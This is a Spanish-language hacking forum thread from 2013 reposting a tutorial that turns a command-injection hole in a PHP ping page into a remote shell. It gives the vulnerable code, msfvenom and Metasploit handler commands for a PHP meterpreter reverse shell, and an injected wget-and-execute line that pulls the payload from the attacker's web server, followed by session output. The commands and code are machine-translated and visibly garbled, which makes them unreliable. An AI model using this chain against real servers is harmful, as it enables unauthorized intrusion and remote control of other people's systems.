comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Command-injection-to-shell

  • 2 Respuestas
  • 2252 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado ZanGetsu

  • *
  • Underc0der
  • Mensajes: 325
  • Actividad:
    0%
  • Reputación 0
  • I ZanGetsu
    • Ver Perfil
  • Skype: thenicox
  • Twitter: black_zangetsu
« en: Abril 01, 2013, 02:09:05 am »
Introducción

Descripción

En este tutorial, aprenderás cómo tomar el control de un servidor que es vulnerable a una vulnerabilidad de inyección de comandos.
Medio ambiente

El siguiente tutorial ha sido probado en el siguiente entorno:
atacante:
Dirección IP: 192.168.1.43
Distribución: BackTrack 5 R3
objetivo
Dirección IP: 192.168.1.16
Distribución: Debian 6
Ejemplo

Código

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
<html>
<head>
<title> ping host </ title>
</ Head>
<body>
<form method="get" action="">
  <input type="text" /> name="host"
  <input type="submit" value="ping host" />
</ Form>
<? Php
if (isset ($ _GET ['host'])) {
  $ Salida = shell_exec ("ping-c1" $ _GET ['host'].);
  echo "<pre> $ salida </ pre>";
}
?>
</ Body>
</ Html>
El uso normal

En el uso normal, esta aplicación se supone para generar el resultado del comando ping contra un host solicitado:

Vulnerabilidad

Este código es vulnerable, ya que no desinfectar las entradas del usuario. Es posible inyectar otros comandos:

Explotación

Crear shell con msfvenom
Vamos a aprovechar esta vulnerabilidad para descargar un shell inversa PHP. Pero en primer lugar crear el shell con msfvenom :
root @ bt: ~ # msfvenom-p php / meterpreter / reverse_tcp-f lhost prima = 192.168.1.43 lport = 4050> / var / www / shell.txt
root @ bt: ~ # cabeza / var / www / shell.txt
# <? Php

error_reporting (0);
# El controlador de carga sobrescribirá con el lhost correcto antes de enviar
# A la víctima.
$ Ip = '192 .168.1.43 ';
$ Port = 4050;
$ Ipf = AF_INET;

si (== FALSE strpos ($ ip,! ":")) {
Como se puede ver, la primera línea está comentada. Vamos a quitar el comentario:
root @ bt: ~ # sed-i '¡¯ s / # <php / <php /' / var / www / shell.txt
Iniciar servidor web en la máquina del atacante
Aunque sería posible alojar nuestro shell PHP en una tercera parte, es conveniente en nuestro tutorial de ser el anfitrión de la máquina del atacante directamente. Vamos a comenzar nuestro servidor web:
root @ bt: ~ # servicio apache2 inicio
 * Inicio del servidor web apache2 [OK]
Comience escuchando en el puerto 4050 de la máquina del atacante
De BT5, abramos nuestro oyente:
root @ bt: ~ # msfconsole
msf> use multi / handler
exploit msf (manejador)> set payload php / meterpreter / reverse_tcp
msf exploit (manejador)> set lhost 192.168.1.43
msf exploit (manejador)> set lport 4050
msf exploit (manejador )> explotar

  • Started inversa controlador en 192.168.1.43:4050
  • A partir del controlador de carga útil ...

Descarga shell desde el host vulnerable
Vamos a aprovechar la vulnerabilidad y descargar el shell del servidor web del atacante. Escriba el siguiente comando en el campo "máquina":
; No tienes permisos para ver links. Registrate o Entra con tu cuenta wget-O / tmp / shell.php; php-f / tmp / shell.php
El comando anterior descarga shell.txt como shell.php en el directorio / tmp y ejecutar el shell php (php-f / tmp / shell.php)
Pruebe el shell inversa
Ahora tenemos un meterpreter:
...
  • Envío etapa (38791 bytes) para 192.168.1.16
  • Periodo de sesiones Meterpreter 1 abierto (192.168.1.43:4050 -> 192.168.1.16:40107) en 05/05/2012 21:02:34 -0400


meterpreter> sysinfo
Equipo: snort
OS: Linux snort 2.6.32-5-686 # 1 SMP Lun Ene 16 16:04:25 UTC 2012 i686
Meterpreter: php / php
meterpreter> shell
Proceso 3845 creado.
Canal creado 0.
/ Sbin / ifconfig
eth0 Link a encap: Ethernet HWaddr 00:0 c: 29:97:32:0 f 
          inet addr: 192.168.60.129 Bcast: 192.168.60.255 Máscara: 255.255.255.0
          inet6 addr: fe80 :: 20c: 29ff: fe97: 320f/64 Alcance: Enlace
          UP BROADCAST RUNNING MULTICAST MTU: 1500 Métrica: 1
          RX packets: 530 errors: 0 caído: 0 sobrecostos: 0 frame: 0
          TX paquetes: 285 errores: 0 caído: 0 sobrecostos: 0 carrier: 0
          colisiones: 0 txqueuelen: 1000
          RX bytes: 62923 (61.4 KiB) TX bytes: 31150 (30.4 KiB)
          Interrupción: 19 Dirección base: 0x2000

eth1 Enlace encap: Ethernet HWaddr 00:0 c: 29:97:32:19 
          inet addr: 192.168.1.16 Bcast: 192.168.1.255 Máscara: 255.255.255.0
          inet6 addr: 2a01: e35: 8b15: 3430:20 c: 29ff: fe97: 3219/64 Scope: Global
          inet6 addr: fe80 :: 20c: 29ff: fe97: 3219/64 Alcance: Vínculo
          UP BROADCAST RUNNING MULTICAST MTU: 1500 Métrica: 1
          RX packets: 9694 errors: 0 caído: 0 sobrecostos: 0 frame: 0
          TX paquetes: 3451 errores: 0 caído: 0 sobrecostos: 0 carrier: 0
          colisiones: 0 txqueuelen: 1000
          RX bytes: 2119587 (2,0 MiB) TX bytes: 1297681 (1.2 MiB)
          Interrupción: 16 Dirección base: 0x2080

lo Link encap: Bucle local 
          inet addr: 127.0.0.1 Máscara: 255.0.0.0
          inet6 ::: 1/128 Alcance: Anfitrión
          ARRIBA LOOPBACK RUNNING MTU: 16436 Metric: 1
          RX packets: 2597 errors: 0 caído: 0 sobrecostos: 0 frame: 0
          TX paquetes: 2597 errores: 0 caído: 0 sobrecostos: 0 carrier: 0
          colisiones: 0 txqueuelen: 0
          RX bytes: 365075 (356.5 KiB) TX bytes: 365075 (356.5 Kb)

Fuente: Aldreid.net

Observa Mejor el Post Aqui : No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado [3V1L]

  • *
  • Underc0der
  • Mensajes: 19
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #1 en: Abril 01, 2013, 03:08:32 am »
Buen aporte, note que el code es apueba de lammers! XD

Desconectado ZanGetsu

  • *
  • Underc0der
  • Mensajes: 325
  • Actividad:
    0%
  • Reputación 0
  • I ZanGetsu
    • Ver Perfil
  • Skype: thenicox
  • Twitter: black_zangetsu
« Respuesta #2 en: Abril 01, 2013, 03:11:11 am »
cierto, xd

 

¿Te gustó el post? COMPARTILO!



Conexion Cliente Servidor [Tool t3c4i3`s Remote Access Shell]

Iniciado por Progresive Death

Respuestas: 1
Vistas: 1934
Último mensaje Mayo 13, 2011, 02:35:37 pm
por schegell cernunnos
Subiendo Shell desde el Panel de Administracion con Upload de Imagenes

Iniciado por ZanGetsu

Respuestas: 13
Vistas: 6311
Último mensaje Octubre 14, 2013, 10:42:26 pm
por Devilboy
Usando módulos auxiliarys SSH (SECURE SHELL) [1,2] Parte

Iniciado por OswireW0rding

Respuestas: 2
Vistas: 2050
Último mensaje Marzo 12, 2014, 04:33:49 pm
por OswireW0rding
XLSInjector – Inyectar Shell Meterpreter en Archivos Excel

Iniciado por Stuxnet

Respuestas: 4
Vistas: 3078
Último mensaje Noviembre 19, 2014, 07:13:03 pm
por baron.power
Terminos, Definiciones Exploit, Shell, Bof, Ruby

Iniciado por Krau[Z]ereth

Respuestas: 10
Vistas: 10180
Último mensaje Mayo 11, 2015, 02:24:09 am
por Baxtar